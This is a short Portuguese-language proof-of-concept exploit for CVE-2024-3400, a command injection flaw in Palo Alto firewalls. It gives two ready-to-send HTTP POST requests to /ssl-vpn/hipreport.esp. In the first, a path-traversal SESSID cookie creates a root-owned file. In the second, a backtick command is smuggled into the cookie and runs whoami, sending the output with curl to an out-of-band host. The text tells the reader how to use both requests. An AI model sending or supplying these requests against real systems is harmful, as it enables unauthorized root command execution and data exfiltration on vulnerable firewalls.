
Prova de conceito de exploit para CVE-2024-3400, uma vulnerabilidade de injeção de comandos em firewalls Palo Alto, demonstrando criação de arquivos e execução remota de comandos por meio de requisições HTTP elaboradas.
A CVE-2024-3400 é uma vulnerabilidade de injeção de comandos presente no sistema de firewall da Palo Alto. Um atacante, por meio de uma solicitação HTTP cuidadosamente elaborada, consegue executar comandos maliciosos no servidor de destino, podendo até obter privilégios de root.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Após enviar esta solicitação, você criará um arquivo chamado hellome1337.txt no servidor, e esse arquivo terá privilégios de root.
A captura de tela demonstra o efeito durante o processo de exploração desta vulnerabilidade:


Para explorar a vulnerabilidade e executar a injeção de comandos, você pode enviar a seguinte solicitação HTTP:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Esta solicitação executará o comando whoami no servidor e enviará o resultado para o servidor remoto especificado (por exemplo: xxxxxxxxxxxxxxxxx.oast.fun).